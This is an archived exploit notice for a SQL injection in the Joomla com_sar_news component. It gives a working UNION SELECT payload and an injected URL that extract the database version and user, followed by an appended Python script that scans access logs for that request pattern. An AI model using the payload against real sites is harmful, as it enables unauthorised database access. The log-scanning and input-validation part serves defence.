Joomla Sar News SQL Injection

2010-06-02T00:00:00
ID PACKETSTORM:90191
Type packetstorm
Reporter LyNx
Modified 2010-06-02T00:00:00

Description

                                        
                                            `  
  
# Exploit Title: Joomla com_sar_news SQL Injection vulnerability  
# Date: 02 June 2010  
# Author: LyNx (syntax3rror@ymail.com)  
# Platform / Tested on: Windows XP 2  
# category: webapps/0day  
# Code :  
  
==== SQLI EXPLOIT ====  
/**/AND/**/1=2/**/UNION/**/SELECT/**/1,version(),3,4,5,6,7,8,9,10,11,12,user(),14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33/*  
  
==== VULN IN HERE ====  
  
http://localhost/joomla/index.php?option=com_sar_news&id=80[c0de]&sort_by=ordering  
  
  
==== LIVE DEMO ====  
  
http://localhost/joomla/index.php?option=com_sar_news&id=80/**/AND/**/1=2/**/UNION/**/SELECT/**/1,version(),3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33/*&sort_by=ordering  
  
[x]-------------------------------------------------------------------  
Thanks To :  
system_rt0, bobyhikaru, kamtiEz, r3m1ck, otong, bumble_be, anharku,  
virgi, ranggamaggic, shadowsmaker  
suddent_death, pl4nkt0n, pokeng, demnas, Xr0b0t, all crew indonesia  
hacker and all outsider...  
  
[x]-------------------------------------------------------------------  
[x] www.indonesianhacker.or.id  
[x] strong, we shine  
[x]-------------------------------------------------------------------  
  
  
  
`
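
A defender-side check for the request pattern shown above, added here as an example and not part of the original advisory: it scans web-server access logs for `option=com_sar_news` requests whose `id` parameter is not a plain integer. The Apache-style log format, the sample lines and the function names are assumptions constructed for illustration.

```python
import re
from urllib.parse import parse_qs, urlsplit

# Constructed sample access-log lines (documentation IP range), not real traffic.
SAMPLE_LOG = """\
192.0.2.10 - - [02/Jun/2010:10:00:01 +0000] "GET /joomla/index.php?option=com_sar_news&id=80&sort_by=ordering HTTP/1.1" 200 5120
192.0.2.44 - - [02/Jun/2010:10:00:07 +0000] "GET /joomla/index.php?option=com_sar_news&id=80/**/AND/**/1=2/**/UNION/**/SELECT/**/1,version(),3/*&sort_by=ordering HTTP/1.1" 200 4871
192.0.2.44 - - [02/Jun/2010:10:00:09 +0000] "GET /joomla/index.php?option=com_sar_news&id=80%2F%2A%2A%2FUNION%2F%2A%2A%2FSELECT%2F%2A%2A%2F1&sort_by=ordering HTTP/1.1" 200 4871
192.0.2.10 - - [02/Jun/2010:10:00:12 +0000] "GET /joomla/index.php?option=com_content&id=12 HTTP/1.1" 200 3300
"""

# Client address and request target from a common/combined-format log line.
REQUEST_RE = re.compile(r'^(\S+) .*?"(?:GET|POST|HEAD) (\S+) HTTP/[\d.]+"')
# Tokens that have no place in a numeric article id.
SQL_HINT_RE = re.compile(r"/\*|--|'|\b(?:union|select|and|or)\b", re.I)


def classify(target):
    """Return None if the request target is unremarkable, else a reason string."""
    query = parse_qs(urlsplit(target).query, keep_blank_values=True)
    if "com_sar_news" not in query.get("option", []):
        return None
    for value in query.get("id", []):  # parse_qs has already percent-decoded
        if re.fullmatch(r"[0-9]+", value):
            continue
        return "sql-syntax-in-id" if SQL_HINT_RE.search(value) else "non-numeric-id"
    return None


def scan(log_text):
    """Return (client, reason, target) for every flagged log line."""
    findings = []
    for line in log_text.splitlines():
        match = REQUEST_RE.match(line)
        if not match:
            continue
        client, target = match.groups()
        reason = classify(target)
        if reason:
            findings.append((client, reason, target))
    return findings


if __name__ == "__main__":
    for client, reason, target in scan(SAMPLE_LOG):
        print(f"{client}\t{reason}\t{target}")
```

The same integer-only rule on `id` is what the component should enforce server-side before the value reaches a query; the log check only shows whether the pattern has already been requested.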